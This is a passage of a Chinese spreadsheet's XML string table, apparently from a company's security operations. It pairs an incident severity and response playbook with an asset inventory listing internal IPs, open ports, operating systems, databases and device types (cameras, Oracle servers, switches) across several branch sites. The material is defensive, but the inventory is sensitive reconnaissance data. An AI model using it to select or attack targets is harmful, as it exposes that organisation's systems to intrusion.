      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FFFFC000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFFC000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（对标国家标准IV级事件）</t>
    </r>
  </si>
  <si>
    <t>因安全事件导致的内网小范围出现的网络延时或故障，信息系统功能缺陷或者短暂不可用，导致个别用户或者业务受影响等技术层面的事件，但是这些事件没有带来实际的损失和影响。</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1、网络攻击类</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1）外部攻击成功</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">（主机收到垃圾邮件/方法过滤/目录遍历攻击/过滤HTTP出错页面/其他符合该等级的事件）
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>2）内部横向或内对外攻击失败</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">（漏洞利用攻击/SQL注入攻击/SMB暴力破解/其他符合该等级的事件）
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">2、病毒木马类
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1）如僵尸网络/木马病毒/挖矿病毒/恶意文件/其他符合该等级的事件</t>
    </r>
  </si>
  <si>
    <t>通告时间：从安全日志分析研判到通告，用时&lt;30min
遏制影响时间：遏制影响时间&lt;4h
准确率：安全事件经过人工确认后，准确率达到99%
闭环率：100%</t>
  </si>
  <si>
    <t>抑制--&gt;调查--&gt;处置</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>非感染型病毒</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>（例：主机访问黑客工具C2地址）</t>
    </r>
  </si>
  <si>
    <t>一般事件</t>
  </si>
  <si>
    <t>抑制：联动AF封堵外联目的IP/域名、联动EDR隔离主机可疑文件或主机网络权限
调查：联动EDR执行全盘查杀，关联主机流量侧行为日志调查扩散的影响范围
处置：清除主机病毒文件</t>
  </si>
  <si>
    <t>攻击者对内网发起的有组织，有预谋的持续性网络攻击（如 APT）</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1、网络攻击类
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1）外部攻击失败（如APT攻击/持续性攻击）</t>
    </r>
  </si>
  <si>
    <t>通告时间：从安全日志分析研判到通告，用时&lt;1h
遏制影响时间：遏制影响时间&lt;1h
准确率：安全事件经过人工确认后，准确率达到99%
闭环率：100%</t>
  </si>
  <si>
    <t>抑制--&gt;处置</t>
  </si>
  <si>
    <t>脆弱性利用</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>漏洞</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>（例：Shiro反序列化漏洞）</t>
    </r>
  </si>
  <si>
    <t>抑制：联动AF封堵攻击源IP
调查：查明主机是否存在对应利用的漏洞，核实是否存在被利用成功的痕迹
加固：加固漏洞补丁以及安全防护策略</t>
  </si>
  <si>
    <t>攻击者对内网发起网络安全攻击，但是对业务未造成任何影响</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1、网络攻击类</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
1）外部攻击失败（如网站扫描/端口扫描/webshell上传/SQL注入攻击/其他符合该等级的事件）</t>
    </r>
  </si>
  <si>
    <t>通告时间：从安全日志分析研判到通告，用时&lt;2h
遏制影响时限：遏制影响时间&lt;4h
准确率：安全事件经过人工确认后，准确率达到99%
闭环率：100%</t>
  </si>
  <si>
    <t>抑制</t>
  </si>
  <si>
    <t>弱密码</t>
  </si>
  <si>
    <t>调查：针对互联网用户和管理员账户弱密码登录成功的，实时通告预警，核实是否为用户正常登录,如为用户正常登录则提醒修改强密码，如非用户登录则提醒用户立即修改密码或禁用账户；
加固：立即修改单用户密码，在应用系统层面加强密码规则</t>
  </si>
  <si>
    <t>业务连续性</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基础环境异常</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>：安全组件日志无法同步或同步时延增大</t>
    </r>
  </si>
  <si>
    <t>调查：查明组件是否运行正常，安全策略和日志是否有效
处置：针对安全设备存在的问题协调产品售后支持解决</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>业务访问中断：</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>网站无法访问、设备接入云端平台离线</t>
    </r>
  </si>
  <si>
    <t>调查：查明是否为网络中断或对应系统软件/硬件工作异常，及时通告预警；
处置：排除故障，恢复业务</t>
  </si>
  <si>
    <t>序号</t>
  </si>
  <si>
    <t>*业务名称</t>
  </si>
  <si>
    <t>*IP/URL</t>
  </si>
  <si>
    <t>*业务等级</t>
  </si>
  <si>
    <t>*服务类型</t>
  </si>
  <si>
    <t>*资产类型</t>
  </si>
  <si>
    <t>业务责任人</t>
  </si>
  <si>
    <t>业务责任人邮箱</t>
  </si>
  <si>
    <t>业务责任人电话</t>
  </si>
  <si>
    <t>Agent ID</t>
  </si>
  <si>
    <t>存活状态</t>
  </si>
  <si>
    <t>资产标签</t>
  </si>
  <si>
    <t>服务/端口</t>
  </si>
  <si>
    <t>操作系统</t>
  </si>
  <si>
    <t>数据库</t>
  </si>
  <si>
    <t>中间件</t>
  </si>
  <si>
    <t>开发语言</t>
  </si>
  <si>
    <t>开发框架</t>
  </si>
  <si>
    <t>应用/服务</t>
  </si>
  <si>
    <t>AF可防护</t>
  </si>
  <si>
    <t>EDR状态</t>
  </si>
  <si>
    <t>设备产商</t>
  </si>
  <si>
    <t>设备名称</t>
  </si>
  <si>
    <t>域名/URL</t>
  </si>
  <si>
    <t>应用品牌</t>
  </si>
  <si>
    <t>应用版本</t>
  </si>
  <si>
    <t>资产管理部门</t>
  </si>
  <si>
    <t>资产责任人</t>
  </si>
  <si>
    <t>资产责任人邮箱</t>
  </si>
  <si>
    <t>资产责任人电话</t>
  </si>
  <si>
    <t>扫描设备</t>
  </si>
  <si>
    <t>分支</t>
  </si>
  <si>
    <t>安全域</t>
  </si>
  <si>
    <t>公网IP</t>
  </si>
  <si>
    <t>映射端口</t>
  </si>
  <si>
    <t>被映射端口</t>
  </si>
  <si>
    <t>资产发现系统默认分组</t>
  </si>
  <si>
    <t>192.168.20.211</t>
  </si>
  <si>
    <t>一般</t>
  </si>
  <si>
    <t>服务外</t>
  </si>
  <si>
    <t>在线</t>
  </si>
  <si>
    <t>dhanalakshmi(34567)
soap(8899)
unknown(9530,34561)
http(80)
rtsp(554)</t>
  </si>
  <si>
    <t xml:space="preserve">linux </t>
  </si>
  <si>
    <t>uc-httpd 1.0.0</t>
  </si>
  <si>
    <t>gSOAP 2.7</t>
  </si>
  <si>
    <t>NETSurveillance(Xiongmai-Cameras-and-Surveillance)(uc-httpd),DVR</t>
  </si>
  <si>
    <t>内网</t>
  </si>
  <si>
    <t>192.168.17.248</t>
  </si>
  <si>
    <t>http(9000,5357,8585)
pando-pub(7680)
mysql(3306)
msrpc(49667,49665,49670,135,49675,49664,49666,49669,49668)
netbios-ssn(139)
ms-wbt-server(4490)
microsoft-ds(445)
unknown(55064,5040)</t>
  </si>
  <si>
    <t xml:space="preserve">windows </t>
  </si>
  <si>
    <t>MySQL</t>
  </si>
  <si>
    <t>HttpSvr
Microsoft-HTTPAPI 2.0
Apple-HFS</t>
  </si>
  <si>
    <t>HttpSvr,Microsoft-HTTPAPI,Apple-HFS</t>
  </si>
  <si>
    <t>192.168.100.243</t>
  </si>
  <si>
    <t>ssh(22)
tcpwrapped(64443)</t>
  </si>
  <si>
    <t>172.20.34.73</t>
  </si>
  <si>
    <t>http(80)
ssl(443,4480,23031,23020)
ssh(22)
iscsi(3260)</t>
  </si>
  <si>
    <t>Apache httpd</t>
  </si>
  <si>
    <t>Sangfor-Enterprise Cloud Platform(Apache httpd)</t>
  </si>
  <si>
    <t>Sangfor Technologies Inc.(Apache Software Foundation)</t>
  </si>
  <si>
    <t>192.168.21.9</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>192.168.21.4</t>
  </si>
  <si>
    <t>192.168.21.6</t>
  </si>
  <si>
    <t>192.168.21.230</t>
  </si>
  <si>
    <t>192.168.21.19</t>
  </si>
  <si>
    <t>unknown(17561)
ms-wbt-server(3389)
tcpwrapped(53000)
afs3-callback(7001)
soap(52000)
wap-wsp(9200)</t>
  </si>
  <si>
    <t>192.168.22.238</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
rtsp(554)
tcpwrapped(8686)
upnp(5000)</t>
  </si>
  <si>
    <t>是</t>
  </si>
  <si>
    <t>dahua-camera</t>
  </si>
  <si>
    <t>天津</t>
  </si>
  <si>
    <t>192.168.17.158</t>
  </si>
  <si>
    <t>192.168.21.13</t>
  </si>
  <si>
    <t>tcpwrapped(80)
rtsp(554)
dhanalakshmi(34567)
unknown(9527,9530,34599)
telnet(23)
soap(8180)</t>
  </si>
  <si>
    <t>DVR</t>
  </si>
  <si>
    <t>无</t>
  </si>
  <si>
    <t>192.168.23.220</t>
  </si>
  <si>
    <t>eSoft
Mongoose</t>
  </si>
  <si>
    <t>eSoft,Mongoose,mongo,DVR</t>
  </si>
  <si>
    <t>武汉极乐汤帝派鞋柜服务器</t>
  </si>
  <si>
    <t>192.168.4.219</t>
  </si>
  <si>
    <t>重要</t>
  </si>
  <si>
    <t>服务内(7*24H)</t>
  </si>
  <si>
    <t>MSS-XDR</t>
  </si>
  <si>
    <t>ajp13(8009)
http(8096)</t>
  </si>
  <si>
    <t>Apache Jserv</t>
  </si>
  <si>
    <t>武汉</t>
  </si>
  <si>
    <t>192.168.19.253</t>
  </si>
  <si>
    <t>targus-getdata(5200)
upnp(5000)
admd(5100)
hacl-hb(5300)</t>
  </si>
  <si>
    <t>武汉漏扫工具TSS</t>
  </si>
  <si>
    <t>192.168.4.214</t>
  </si>
  <si>
    <t>扫描器</t>
  </si>
  <si>
    <t>ssl(443)
java-rmi(1099)
http(8082)
https(5680)</t>
  </si>
  <si>
    <t>OpenResty</t>
  </si>
  <si>
    <t>Bootstrap Table(jQuery)</t>
  </si>
  <si>
    <t>OpenResty Inc.</t>
  </si>
  <si>
    <t>数据平台-数仓-主库</t>
  </si>
  <si>
    <t>172.16.6.50</t>
  </si>
  <si>
    <t>核心</t>
  </si>
  <si>
    <t>1974090767</t>
  </si>
  <si>
    <t>ssh(22)
rpcbind(111)
oracle-tns(1521)
oracle(31931)
tcpwrapped(10050)
raxa-mgmt(6099)</t>
  </si>
  <si>
    <t>Oracle</t>
  </si>
  <si>
    <t>上海</t>
  </si>
  <si>
    <t>外网</t>
  </si>
  <si>
    <t>122.144.156.35</t>
  </si>
  <si>
    <t>192.168.19.238</t>
  </si>
  <si>
    <t>telnet(23)
jamlink(8091)
tcpwrapped(554)
http(80)</t>
  </si>
  <si>
    <t>192.168.88.67</t>
  </si>
  <si>
    <t>onvif(3702)
tor-socks(9050)
soap(80)
http-alt(8000)
upnp(5000)
login(513)
http(8080)
telnet(23)
tcpwrapped(514,9001,554,21)
cslistener(9000)</t>
  </si>
  <si>
    <t>WAPA-HttpServer</t>
  </si>
  <si>
    <t>192.168.24.223</t>
  </si>
  <si>
    <t>rtsp(554)
http(80)
ssl(443)
tcpwrapped(322)
hikvision-nvr(8000)</t>
  </si>
  <si>
    <t>Webserver</t>
  </si>
  <si>
    <t>Hikvision-IP CAMERA,hikvision-camera,Hikvision-NVR(Webserver)</t>
  </si>
  <si>
    <t>192.168.88.64</t>
  </si>
  <si>
    <t>192.168.24.19</t>
  </si>
  <si>
    <t>http(80)
unknown(37777)
d-s-n(8086)
rtsp(554)</t>
  </si>
  <si>
    <t>seajs(jQuery)</t>
  </si>
  <si>
    <t>192.168.19.26</t>
  </si>
  <si>
    <t>192.168.24.15</t>
  </si>
  <si>
    <t>172.16.1.10</t>
  </si>
  <si>
    <t>ssl(443,4433,8443)</t>
  </si>
  <si>
    <t>Sangfor-aTrust</t>
  </si>
  <si>
    <t>Sangfor Technologies Inc.</t>
  </si>
  <si>
    <t>192.168.24.218</t>
  </si>
  <si>
    <t>192.168.24.188</t>
  </si>
  <si>
    <t>192.168.24.130</t>
  </si>
  <si>
    <t>192.168.24.207</t>
  </si>
  <si>
    <t>192.168.19.162</t>
  </si>
  <si>
    <t>http(80)
hikvision-nvr(8000)
rtsp(554)</t>
  </si>
  <si>
    <t>Hikvision-NVR(Webserver)(hikvision-camera),Hikvision-IP CAMERA</t>
  </si>
  <si>
    <t>172.16.1.21</t>
  </si>
  <si>
    <t>ssh(22)
telnet(23)
http(80)</t>
  </si>
  <si>
    <t>Apache httpd(Switch)</t>
  </si>
  <si>
    <t>Apache httpd(Switch)(Brocade-Switch)</t>
  </si>
  <si>
    <t>192.168.19.127</t>
  </si>
  <si>
    <t>192.168.19.213</t>
  </si>
  <si>
    <t>192.168.23.97</t>
  </si>
  <si>
    <t>192.168.23.26</t>
  </si>
  <si>
    <t>192.168.23.28</t>
  </si>
  <si>
    <t>192.168.23.116</t>
  </si>
  <si>
    <t>192.168.23.114</t>
  </si>
  <si>
    <t>主数据库服务器（超融合机器）</t>
  </si>
  <si>
    <t>192.168.9.100</t>
  </si>
  <si>
    <t>836640792</t>
  </si>
  <si>
    <t>tcpwrapped(49456,31155,1521,10050,111,22)</t>
  </si>
  <si>
    <t>成都</t>
  </si>
  <si>
    <t>192.168.23.42</t>
  </si>
  <si>
    <t>192.168.23.63</t>
  </si>
  <si>
    <t>武汉闸机</t>
  </si>
  <si>
    <t>192.168.4.107</t>
  </si>
  <si>
    <t>http(80)
ssh(22)</t>
  </si>
  <si>
    <t>Boa 0.94.13</t>
  </si>
  <si>
    <t>Boa</t>
  </si>
  <si>
    <t>192.168.22.79</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
hikvision-nvr(8000)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.21.125</t>
  </si>
  <si>
    <t>http(80)
unknown(37777)
rtsp(554)</t>
  </si>
  <si>
    <t>seajs(layer.js)(jQuery)</t>
  </si>
  <si>
    <t>192.168.23.115</t>
  </si>
  <si>
    <t>192.168.23.77</t>
  </si>
  <si>
    <t>192.168.21.25</t>
  </si>
  <si>
    <t>http(80)
unknown(37777)
tcpwrapped(8686)
rtsp(554)</t>
  </si>
  <si>
    <t>Chart.js(seajs)(jQuery)</t>
  </si>
  <si>
    <t>192.168.21.41</t>
  </si>
  <si>
    <t>unknown(9527,34561,34599)
soap(8899)
rtsp(554)
dhanalakshmi(34567)
http(80)
telnet(23)</t>
  </si>
  <si>
    <t>192.168.21.81</t>
  </si>
  <si>
    <t>dsf(555)
jamlink(8091)
unknown(10016)
ppp(3000)
http(80,554)</t>
  </si>
  <si>
    <t>gSOAP 2.8</t>
  </si>
  <si>
    <t>192.168.21.191</t>
  </si>
  <si>
    <t>192.168.20.225</t>
  </si>
  <si>
    <t>192.168.4.109</t>
  </si>
  <si>
    <t>winpos服务器-1</t>
  </si>
  <si>
    <t>192.168.1.103</t>
  </si>
  <si>
    <t>1974746515</t>
  </si>
  <si>
    <t>ms-wbt-server(3389)
netbios-ssn(139)
ftp(10083)
http(80,81,10082)
914c-g(211)
msmq(1801)
msrpc(2105,2103,2107,135)
microsoft-ds(445)
tcpwrapped(21)</t>
  </si>
  <si>
    <t>Microsoft IIS httpd</t>
  </si>
  <si>
    <t>Microsoft Corporation</t>
  </si>
  <si>
    <t>青岛</t>
  </si>
  <si>
    <t>192.168.100.183</t>
  </si>
  <si>
    <t>telnet(23)
tcpwrapped(64443)</t>
  </si>
  <si>
    <t>192.168.7.159</t>
  </si>
  <si>
    <t>192.168.7.113</t>
  </si>
  <si>
    <t>192.168.7.209</t>
  </si>
  <si>
    <t>192.168.7.179</t>
  </si>
  <si>
    <t>192.168.7.137</t>
  </si>
  <si>
    <t>武汉数据库异地备份服务器</t>
  </si>
  <si>
    <t>192.168.4.216</t>
  </si>
  <si>
    <t>1454675064</t>
  </si>
  <si>
    <t>192.168.7.116</t>
  </si>
  <si>
    <t>192.168.7.167</t>
  </si>
  <si>
    <t>192.168.7.127</t>
  </si>
  <si>
    <t>天津数据库集群vip</t>
  </si>
  <si>
    <t>192.168.22.51</t>
  </si>
  <si>
    <t>2703914446</t>
  </si>
  <si>
    <t>oracle-tns(1521,19365)
rpcbind(111)
ssh(22)
tcpwrapped(10050)
status(45265)
raxa-mgmt(6099)</t>
  </si>
  <si>
    <t>192.168.7.21</t>
  </si>
  <si>
    <t>192.168.7.146</t>
  </si>
  <si>
    <t>192.168.7.155</t>
  </si>
  <si>
    <t>unknown(37777)
upnp(5000)
http(80)
radan-http(8088)
rtmp(1935)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.8.62</t>
  </si>
  <si>
    <t>192.168.8.14</t>
  </si>
  <si>
    <t>192.168.7.67</t>
  </si>
  <si>
    <t>192.168.8.178</t>
  </si>
  <si>
    <t>radan-http(8088)
unknown(37777)
http(80)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.7.98</t>
  </si>
  <si>
    <t>192.168.8.183</t>
  </si>
  <si>
    <t>192.168.8.128</t>
  </si>
  <si>
    <t>青岛数据库测试服务器</t>
  </si>
  <si>
    <t>192.168.1.191</t>
  </si>
  <si>
    <t>ssh(22)
rpcbind(111)</t>
  </si>
  <si>
    <t>192.168.7.90</t>
  </si>
  <si>
    <t>layer.js(seajs)(jQuery)</t>
  </si>
  <si>
    <t>192.168.8.174</t>
  </si>
  <si>
    <t>192.168.8.156</t>
  </si>
  <si>
    <t>192.168.7.79</t>
  </si>
  <si>
    <t>青岛超融合物理服务器地址</t>
  </si>
  <si>
    <t>192.168.1.175</t>
  </si>
  <si>
    <t>mysql(3306)
ftp(21)</t>
  </si>
  <si>
    <t xml:space="preserve">other </t>
  </si>
  <si>
    <t>zabbix代理服务器-上海</t>
  </si>
  <si>
    <t>172.16.5.32</t>
  </si>
  <si>
    <t>4144633886</t>
  </si>
  <si>
    <t>ssl(10051)
rpcbind(111)
mysql(3306)
ssh(22)
mysqlx(33060)</t>
  </si>
  <si>
    <t>MySQL
MySQL X protocol listener</t>
  </si>
  <si>
    <t>192.168.8.81</t>
  </si>
  <si>
    <t>192.168.8.106</t>
  </si>
  <si>
    <t>192.168.8.63</t>
  </si>
  <si>
    <t>192.168.7.219</t>
  </si>
  <si>
    <t>192.168.8.55</t>
  </si>
  <si>
    <t>192.168.7.82</t>
  </si>
  <si>
    <t>192.168.2.64</t>
  </si>
  <si>
    <t>192.168.7.93</t>
  </si>
  <si>
    <t>192.168.24.242</t>
  </si>
  <si>
    <t>192.168.24.83</t>
  </si>
  <si>
    <t>青岛备份一体机-业务网络</t>
  </si>
  <si>
    <t>192.168.1.9</t>
  </si>
  <si>
    <t>d-data-control(4302)
mysql(3306)
ssh(22)
ds-srvr(4401)
http(8180,4388,8080)
epmd(4369)
redis(6379)
eforward(2181)
rpcbind(2049,111)</t>
  </si>
  <si>
    <t>Redis
MySQL</t>
  </si>
  <si>
    <t>Jetty 9.4.43.v20210629</t>
  </si>
  <si>
    <t>Jetty</t>
  </si>
  <si>
    <t>192.168.13.176</t>
  </si>
  <si>
    <t>192.168.8.23</t>
  </si>
  <si>
    <t>http(80)
unknown(37777)
upnp(5000)
rtmp(1935)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.24.247</t>
  </si>
  <si>
    <t>192.168.19.88</t>
  </si>
  <si>
    <t>dhanalakshmi(34567)
soap(8899)
unknown(9530,34561)
tcpwrapped(80)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.8.1</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
telnet(23)</t>
  </si>
  <si>
    <t>192.168.100.163</t>
  </si>
  <si>
    <t>192.168.100.160</t>
  </si>
  <si>
    <t>192.168.18.117</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
ssh(22)
unknown(17990,17988)</t>
  </si>
  <si>
    <t>jQuery-ui</t>
  </si>
  <si>
    <t>192.168.19.146</t>
  </si>
  <si>
    <t>192.168.19.160</t>
  </si>
  <si>
    <t>192.168.88.63</t>
  </si>
  <si>
    <t>192.168.24.84</t>
  </si>
  <si>
    <t>192.168.24.39</t>
  </si>
  <si>
    <t>192.168.24.38</t>
  </si>
  <si>
    <t>192.168.24.77</t>
  </si>
  <si>
    <t>192.168.2.231</t>
  </si>
  <si>
    <t>http(80)</t>
  </si>
  <si>
    <t>192.168.20.91</t>
  </si>
  <si>
    <t>192.168.100.172</t>
  </si>
  <si>
    <t>192.168.100.155</t>
  </si>
  <si>
    <t>192.168.20.81</t>
  </si>
  <si>
    <t>192.168.20.73</t>
  </si>
  <si>
    <t>192.168.8.131</t>
  </si>
  <si>
    <t>192.168.25.154</t>
  </si>
  <si>
    <t>青岛漏扫工具TSS</t>
  </si>
  <si>
    <t>192.168.2.10</t>
  </si>
  <si>
    <t>jQuery(Bootstrap Table)</t>
  </si>
  <si>
    <t>192.168.19.223</t>
  </si>
  <si>
    <t>192.168.18.101</t>
  </si>
  <si>
    <t>http(80)
ssh(22)
ssl(8208,443,2199,2198)</t>
  </si>
  <si>
    <t>Webserver 1.0.0</t>
  </si>
  <si>
    <t>192.168.24.181</t>
  </si>
  <si>
    <t>192.168.24.204</t>
  </si>
  <si>
    <t>192.168.24.177</t>
  </si>
  <si>
    <t>192.168.24.75</t>
  </si>
  <si>
    <t>192.168.24.147</t>
  </si>
  <si>
    <t>upnp(49152)
http(80)
mit-ml-dev(85)
rtsp(554)
soap(81)</t>
  </si>
  <si>
    <t>192.168.24.98</t>
  </si>
  <si>
    <t>192.168.19.192</t>
  </si>
  <si>
    <t>192.168.20.173</t>
  </si>
  <si>
    <t>soap(8899)
unknown(9527,34561)
tcpwrapped(80)
rtsp(554)
dhanalakshmi(34567)
telnet(23)</t>
  </si>
  <si>
    <t>192.168.19.202</t>
  </si>
  <si>
    <t>192.168.19.16</t>
  </si>
  <si>
    <t>192.168.100.34</t>
  </si>
  <si>
    <t>192.168.100.33</t>
  </si>
  <si>
    <t>ssh(22)
telnet(23)
tcpwrapped(64443)</t>
  </si>
  <si>
    <t>192.168.1.152</t>
  </si>
  <si>
    <t>备数据库-1-2</t>
  </si>
  <si>
    <t>192.168.1.188</t>
  </si>
  <si>
    <t>4279733655</t>
  </si>
  <si>
    <t>ssh(22)
rpcbind(111)
oracle-tns(1521)</t>
  </si>
  <si>
    <t>192.168.100.103</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
telnet(23)
tcpwrapped(64443)</t>
  </si>
  <si>
    <t>simple</t>
  </si>
  <si>
    <t>jQuery</t>
  </si>
  <si>
    <t>simple(Huawei-Switch)</t>
  </si>
  <si>
    <t>192.168.100.127</t>
  </si>
  <si>
    <t>Simple Machines.</t>
  </si>
  <si>
    <t>武汉售票PC电脑</t>
  </si>
  <si>
    <t>192.168.4.28</t>
  </si>
  <si>
    <t>msrpc(135)
ms-wbt-server(3389)
unknown(5040)
http(5357)
netbios-ssn(139)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI</t>
  </si>
  <si>
    <t>192.168.21.168</t>
  </si>
  <si>
    <t>192.168.21.50</t>
  </si>
  <si>
    <t>192.168.1.243</t>
  </si>
  <si>
    <t>unknown(51688,51222)</t>
  </si>
  <si>
    <t>192.168.21.44</t>
  </si>
  <si>
    <t>192.168.19.229</t>
  </si>
  <si>
    <t>192.168.21.78</t>
  </si>
  <si>
    <t>172.16.1.3</t>
  </si>
  <si>
    <t>ssh(22)
telnet(23)</t>
  </si>
  <si>
    <t>192.168.21.102</t>
  </si>
  <si>
    <t>192.168.19.245</t>
  </si>
  <si>
    <t>unknown(6800)
telnet(23)</t>
  </si>
  <si>
    <t>192.168.1.85</t>
  </si>
  <si>
    <t>http(3336)
microsoft-ds(445)
netbios-ssn(139)
unknown(12200,5040)
msrpc(49665,1039,1042,49664,135,49669,49668,49670)</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI 2.0</t>
  </si>
  <si>
    <t>192.168.1.74</t>
  </si>
  <si>
    <t>http(80)
daap(631)</t>
  </si>
  <si>
    <t>192.168.19.222</t>
  </si>
  <si>
    <t>192.168.21.120</t>
  </si>
  <si>
    <t>192.168.21.118</t>
  </si>
  <si>
    <t>192.168.19.183</t>
  </si>
  <si>
    <t>192.168.19.144</t>
  </si>
  <si>
    <t>青岛办公pc或监控</t>
  </si>
  <si>
    <t>192.168.1.5</t>
  </si>
  <si>
    <t>wxbrief(4368)
http(80)
telnet(23)</t>
  </si>
  <si>
    <t>192.168.20.235</t>
  </si>
  <si>
    <t>192.168.0.7</t>
  </si>
  <si>
    <t>telnet(23)</t>
  </si>
  <si>
    <t>192.168.0.2</t>
  </si>
  <si>
    <t>192.168.19.110</t>
  </si>
  <si>
    <t>192.168.19.132</t>
  </si>
  <si>
    <t>192.168.100.128</t>
  </si>
  <si>
    <t>192.168.0.5</t>
  </si>
  <si>
    <t>192.168.0.21</t>
  </si>
  <si>
    <t>192.168.0.9</t>
  </si>
  <si>
    <t>192.168.20.174</t>
  </si>
  <si>
    <t>192.168.20.5</t>
  </si>
  <si>
    <t>sdr(9010)
rtsp(554)
http(80)
hikvision-nvr(8000)
ssl(443)
tambora(9020)</t>
  </si>
  <si>
    <t>192.168.19.36</t>
  </si>
  <si>
    <t>192.168.100.135</t>
  </si>
  <si>
    <t>192.168.19.155</t>
  </si>
  <si>
    <t>192.168.19.175</t>
  </si>
  <si>
    <t>192.168.21.186</t>
  </si>
  <si>
    <t>192.168.18.200</t>
  </si>
  <si>
    <t>ssh(12024)
ssl(443)
ms-wbt-server(12025)
unknown(12020)</t>
  </si>
  <si>
    <t>jQuery Migrate</t>
  </si>
  <si>
    <t>SANGFOR-OSM</t>
  </si>
  <si>
    <t>192.168.21.21</t>
  </si>
  <si>
    <t>192.168.21.121</t>
  </si>
  <si>
    <t>192.168.15.11</t>
  </si>
  <si>
    <t>unknown(23241,56789,60606,59876)</t>
  </si>
  <si>
    <t>192.168.21.89</t>
  </si>
  <si>
    <t>192.168.1.231</t>
  </si>
  <si>
    <t>tcpwrapped(53)</t>
  </si>
  <si>
    <t>192.168.22.236</t>
  </si>
  <si>
    <t>dahua(37810)
rtsp(554)
http(80)
ssl(443)
upnp(5000)
tcpwrapped(8686)</t>
  </si>
  <si>
    <t>192.168.20.9</t>
  </si>
  <si>
    <t>sdr(9010)
rtsp(554)
http(80)
trivnet1(8200)
hikvision-nvr(8000)
upnp(49152)
tambora(9020)</t>
  </si>
  <si>
    <t>Hikvision-IP CAMERA(Hikvision-NVR),vices(hikvision-camera)(UPnP/1.0,-Portable-SDK-for-UPnP-devices)</t>
  </si>
  <si>
    <t>192.168.21.26</t>
  </si>
  <si>
    <t>msrpc(49665,49667,135,49666,49682,49664,49668)
http(5357)
netbios-ssn(139)
pando-pub(7680)
microsoft-ds(445)
unknown(5040,10026)</t>
  </si>
  <si>
    <t>172.16.1.170</t>
  </si>
